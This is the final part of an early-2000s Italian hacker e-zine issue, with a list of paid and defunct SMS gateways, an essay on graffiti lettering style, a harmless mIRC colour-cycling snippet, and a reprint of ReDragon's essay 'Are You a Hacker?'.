  <<< Offrono l'invio di SMS a pagamento. Quando i gateway free erano una rarit, 
potevano anche interessare, adesso sono deserti >>>

 SMS.it *
 150 a messaggio per un sito ricco nell'offerta (invio a tutto il mondo, rubrica, 
corretto numero del mittente, consegna immediata, notifica, archivio, invio multiplo e 
differito, stato messaggio. Adesso questa stessa offerta la si pu trovare a costo zero. 
Se poi preferite lo stesso pagare ...
http://www.sms.it/gratis.htm

 netSms  
Inviare SMS da web (max 150 caratteri) e pagarli  300 ognuno ? Per masochisti
http://netsms.com/

 

Categoria -> siti non pi abilitati
  <<< Cimitero di gateway web2sms. Hanno avuto il loro momento di gloria, 
piccolo o grande, poi non hanno retto i forti costi. Visitarli e vederli non 
operativi mette una certa angoscia ... >>>

  AdriaCom Cell.it JavaroNet ShinySMS  
Questi gateway non sono attualmente attivi.


 
 

 
 
 

 Copyright SMS "NOPOPS" Spa 2000-2001
 
 

              -!--!--!--!--!--!--!--!--!--!--!--!--!--!--!--!-
              	                WRITERS BLOCK (LO STILE)                    
              	                                                     Jrash  
              ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






===================================WRITERS BLOCK (lo stile)====================================
                                                                                                 
(*)*(*)*(*)*(*)*(*)*(*)*(*)*(*)*(*)
Autore: Jrash^^  
Crew  : H@team         
E-mail: jrash@hackersat.com    
URL   : www.hackersat.com     
(*)*(*)*(*)*(*)*(*)*(*)*(*)*(*)*(*)    

Salve ragazzi sono ancora io, Jrash , in questo articolo vorrei parlarvi di un argomento che 
riguarda l HIP HOP ....   un argomento molto interessante leggetelo!! Mi riferisco 
soprattutto a coloro che hanno voglia di imparare..        
Cosa  lo stile??                                               
Andiamo diretti al nocciolo... la sostanza di cui sono fatti i trend.... qualcosa di 
accattivante, qualcosa che ispira profondamente, qualcosa che una volta iniziato fara 
parlare di s e sara seguito dalla gente.... ora arriviamo proprio al culmine..la moda  un 
luogo nel quale si rimane un istante....         lo stile  un luogo che si raggiunge dopo 
aver ricevuto un calcio nel sedere e ci si rimane per sempre . 
Lo stile rimane con te perche sei tu. La moda  nulla senza lo stile, perche lo stile 
governa. Adesso parliamo della parte tecnica e smonteremo la faccenda come se fosse 
una macchina. Rimanendo incollati al concetti di stile e di moda potremmo utilizzare 
una bella ragazza per esempio, anche se verro accusato di masochismo.         
Le frecce sono diventate un fondamento dello stile ..e vanno ancora di moda .
Eppure metterle sul vostro pezzo non bastera a farlo funzionare. 
Coloro i quali riescono a riconoscere quando una cosa sembra ma non 
 riescono ad individiuare i writer che fanno uso di colori pazzeschi 
come anche quelle cose che spuntano dai loro pezzi dando l illusione di 
complessita quando invece  lo schema dei colori a far sembrare le loro 
lettere cosi. 
Non si puo dire che non ci sia lo stile, ma se vogliamo parlare a un altro livello  quello 
che io chiamo robba fasulla. Un mio compare ha detto di quei pezzi che le uniche cose in 
wildstile erano la prima e l ultima lettera, mentre il restante era formato da 
caratteri mediocri con un gusto decente ma senza densita.  
Per prima cosa tenete a mente una cosa: frecce, ornamenti e sfondi non sono segno 
di stile. squisite capacita tecniche e padronanza di tappini e bombolette non 
pareggiano lo stile, ma una combinazione degli elementi qui sopra citati puo 
rendere efficiente lo stile di ognuno . Prima di continuare mi piacerebbe dire che 
tutto questo  stato valutato dopo aver acquisito esperienze e contatto con lo stile 
e dopo aver fatto del lettering un mestiere ...infiniti sono i confini, ma all interno 
dei confini dell infinito esistono fondamenti tecnici del tipo una linea retta non puo 
venire curvata. Tutte queste cose derivano dall esperienza e dall occhio e che ognuno puo 
raggiungere una volta che gliele si porta all attenzione .Non  automatico che tutti i terzi 
occhi vedano la stessa cosa, ma alla fine la maggior parte comprendera la totalita della 
scienza che governa uno stile all interno di questo infinito .     
Possiamo odiare uno stile o amarlo ,ma questo non altera necessariamente la sua qualita. 
Per potere essere un connoisseur, l improrogabile condizione di partenza deve essere 
quella di conoscere la propria roba.               
Non permettete che quelli che pronunciano la parola stile lo facciano senza cognizione di 
causa Potrebbero essere dei falsi. Le decorazioni in origine facevano parte delle 
firme e dei pezzi e potrebbero venire restituite alle firme con lo stile della 
firma come pezzo...ma non come se fosse un idea o concetto definitivo che vada 
controcorrente riguardo ai particolari che una volta venivano usati per i pezzi. 
Prendete nota del fatto che all inizio non esiste vano schemi precisi. Alla fine degli anni 
70 e nei primi anni 80 i writer cominciarono ad avere piu materiale al quale 
riferirsi e quindi un idea migliore delle possibili direzioni da intraprendere . 
Con i pezzi , le connessioni e le frecce si fusero e diedero inizio ad uno stile 
che poi divenne una moda con il proprio stile . Era facile far intuire che questo concetto 
avrebbe potuto essere portato avanti, quindi queste caratteristiche divennero multiple. 
E adesso andremo indietro per scoprire come queste condizioni non determino necessariamente 
la riuscita di un buon pezzo.   Una cosa che noterete delle frecce e che tendono 
sempre ad avere una posizione che possa conferire al pezzo un senso di movimento... possono 
fluire dalla sinistra alla destra , ma se viene a mancare questo tipo di approccio , 
si dovrebbe comunque fare in modo di distribuirle equamente lungo il pezzo. Non sta scritto 
da nessuna parte che debbano andare per forza da sinistra a destra ..ma  
proprio qui che lo stile subentra per completare la moda.           
Le frecce non sono state inventate con lo scopo di avere una funzione precisa, esse 
sono un concetto che inizio  per il semplice motivo che era una cosa che si poteva fare .
E cosi  stato.                                                     
Una volta concepite le frecce , gli errori e gli esperimenti nella loro 
realizzazione portarono a capire che il loro uso , cosi come il loro posizionamento , 
offre variazioni infinite.   E concettuale!! 	In principio furono concepite ed 
introdotte come frecce e punti... ed erano smussate, non appuntite.       
Un famoso writer di new york fu veloce a far notare il fatto che: siccome non c  
nessuno la fuori che sta davvero facendo qualcosa, la roba fiacca viene considerata 
grandiosa ! La mia convinzione  che se i writer portassero questa roba ad un altro livello , 
altri sarebbero in grado di distinguere lo squisito dal bell fatto. La bomba  stata 
sparata ed esplode.Un milione di cerchi, intrecci e duemila frecce non stanno ad 
indicare che ce l hai fatta.  Puoi prendere due pezzi dello stesso writer e vedere 
il perche uno funziona e l altro non ce la fatta...     
Forse perche l aveva fatto troppo complicato rompendo l armonia e la continuita. 
Forse lo schema dei colori non funzionava e rovinava tutto l insieme. forse uno 
normale non riesce a scorgere questi particolari perche i suoi standard si basano 
ancora sul "simile a " , "diverso dal" gente che non fa writing e che non sa nulla 
di cio che i writer considerano "ThE mAgNiFiCiEnT"!     	Non importa quanto uno 
sia bravo tecnicamente, lo stile  l unicita dello stile dipendono dall occhio dalla 
capacita di comprendere le forme e dall immaginazione.   
Si tratta di capire instintivamente come scorrere come dirigere il tratto , come 
collegare le frecce , come unire le lettere , tubi e linee e di conseguenza  una 
cosa che alcuni hanno , mentre altri decisamente no. Tecnicamente il pezzo  l unico 
elemento chiarificante. 	
Ovviamente non si puo fare come i professori ed indicare tutte le imprecisioni 
per cui un pezzo non funziona rispetto ad un altro, vatutto molto al di la degli standard.
Questo  un dato di fatto. E un po come cantare off beat. Uno va in off beat solo 
perche siamo progammati a credere di sapere cosa significhi essere "on beat"? O  
semplicemente un istinto , quello che constringe ad andare in off beat? 
Pensate che tutto questo sia discutibile? Cos  un pezzo in wildstyle che ha senso? Frecce 
che fluiscono ogni dove contro le frecce che nonb riescono a muoversi .   
Se prendete in considerazione la maggior parte dei pezzi , per i quali 
garatisco io stesso che sono fatti senza uno studio preciso, troverete che questo 
approccio  stato assimilato. Per esempio, come dicevo prima , le frecce partono 
di solito da sinistra a destra .   
Possono andare verso l alto , il basso e qualche altra direzione ,ma non possono 
andarsene a spasso da qualunque parte.      
Se fosse cosi tutti riuscirebbero ad essere stilosi...non si potrebbe parlare di pezzi, 
perche non ci sarebbe nessuna base sulla quale discutere la qualita , la 
competenza e la compattezza di una composizione.     	
Penso che questa conversazione potrebbe non avere mai fine. L esperienza dell occhio 
della mente  la miglior insegnante . Gli ornamenti sono dei materiali che non vengono 
utilizzati con le dovute conoscenze sul come lavorarli fuori al meglio...non ti faranno 
mai risultare vincente.									
In un regno in quale i ciechi possono essere d accordo con le nostre convinzioni, 
lo stile...sebbene sia quello che tu lo fai essere...non  sempre farlo ,non senza 
la corretta comprensione delle sue dinamiche. Persino uno stile nuovo ,in grado di 
spezzare il legname con le origini, deve per forza possedere qualcosa che lo renda 
figo, che gli metta le ali ed il suo possedere dovra avere l abilita di assorbire 
questa realta...Opinione??                          
Chiamatelo come volete lo stile  cio che tu ne fai di esso e quello che fai parla 
da solo..Immagginatevi se parlassimo seriamente... o se stessimo riempiendo queste 
pagine solo per farvi impazzire, nel frattempo...mandateci un po di robba vostra e 
smettetela di essere timidi . Senza cercare di avere l ultima parola in merito proveremo 
a farvi notare cosa vi manca ...sempre che abbiate le palle di mettere la vostra roba 
sulla linea del fuoco.......    			
Alla proxima!! Un saluto da parte di Jrash^^!!        

Ringraziamenti:un saluto a tutti quelli dell H@team; un bacione a Morgana^^ e a Maryee!! 
Un FUCK OFF a Giada, e a tutti quelli che mi odiano (dolcissimo=cazzone)!!          

JRASH    		         26/01/2001							          

=====================jrash@hackersat.com===H@team=====================================[Jrash^^]





              -!--!--!--!--!--!--!--!--!--!--!--!--!--!--!--!-
              	                 EFFETTO CON IL MIRC!                       
              	                                                    NCKxxx  
              ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



Ciao ragazzi sono Syn, scrivo questo mini art da parte di un mio amico.
Un giorno mi disse di provare un effetto con il conosciutissimo client "mIRC"...
Mi piaciuto talmente che ho deciso di pubblicarlo.
E' anche un motivo per ringraziarlo e mettere alla luce il suo impegno (sta per finire il suo
script!)

NCKxxx  vivo e vegeto, questo  riferito a molti che chiedono di questo membro!! :)

eccovi il codice:



/timer 0 0 /colour listbox $rand(1,15) | /colour background $rand(1,15) |
 /colour editbox $rand(1,15) | /colour listbox text $rand(1,15) |
 /colour editbox text $rand(1,15) | /colour normal text $rand(1,15) |
 /colour own text $rand(1,15)

 
per termimarlo scrivete /timer 0 off
 
ciao




--------------------------=fInE numero "3" della rivista "DirtyNet"=---------------------------

DirtyNet3  finita...andate in pace...











=RingaZiaMenti= :::::::::::


Tepippo
Screener_it
TankCommandos Crew
Avatar
Lo-Regio
Giada
Federica P.
Agnello
Totti
Carminuccio
Articolo31
Gollo
Scafuto
Scafuti Chip
Carmen Consoli
mR_bIsOn















Chicca:

Are You a Hacker?
                                by ReDragon

        Take a little quiz for me today.  Tell me if you fit this
description.  You got your net account several months ago.  You have been
surfing the net, and you laugh at those media reports of the information
superhighway.  You have a red box, you don't have to pay for phone calls.
You have crackerjack, and you have run it on the password file at a unix
you got an account on.  Everyone at your school is impressed by your computer
knowledge, you are the one the teachers ask for help.  Does this sound
like you?  You are not a hacker.
        There are thousands of you out there.  You buy 2600 and you
ask questions.  You read phrack and you ask questions.  You join
#hack and you ask questions.  You ask all of these questions, and you
ask what is wrong with that?  After all, to be a hacker is to question
things, is it not?  But, you do not want knowledge.  You want answers.
You do not want to learn how things work.  You want answers.  You do not
want to explore.  All you want to know is the answer to your damn
questions.  You are not a hacker.
        Hacking is not about answers.  Hacking is about the path you
take to find the answers.  If you want help, don't ask for answers,
ask for a pointer to the path you need to take to find out those answers
for yourself.  Because it is not the people with the answers that are
the hackers, it is the people that are travelling along the path.









ConClusIOne :::::::::::


L'uomo che sa, sa di non sapere. (Socrate)
Ognuno di noi vuole essere unico, in realt lo siamo tutti. (sYn) 

Il giudizio universale  alle porte...non apritelo, neanche se bussa tre volte!!! (sYn)



Chiunque voglia collaborare , puo' sempre inviare i propi art a "syn@hackersat.com";
 chiaro saranno valutati prima. CMQ siete tutti ben accetti.
                      __     __  ___           ___ ___
                     |  \ | |__)  |  \ / |\ | |__   |    ritorner... 
                     |__/ | |  \  |   |  | \| |___  |